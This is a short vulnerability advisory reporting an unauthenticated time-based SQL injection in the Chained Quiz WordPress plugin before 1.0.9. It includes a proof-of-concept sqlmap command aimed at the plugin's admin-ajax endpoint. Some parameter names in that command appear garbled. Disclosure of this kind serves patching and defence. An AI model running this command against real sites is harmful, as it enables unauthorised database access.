Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection

WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the ‘answer’ and ‘answers’ parameters. Technical details: Chained Quiz appears to be vulnerable to time-based SQL-Injection. The issue lies on the “$answer” backend variable. Privileges required: None

PoC

The following exploit will cause the SQL query to execute and sleep for 10 seconds: Using SQLMAP: sqlmap -u “http://target/wp-admin/admin-ajax.php” --data=“answer=1*&question;_id=1&quiz;_id=1&post;_id=5&question;_type=radio&points;=0&action;=chainedquiz_ajax&chainedquiz;_action=answer&total;_questions=1” --dbms=MySQL --technique T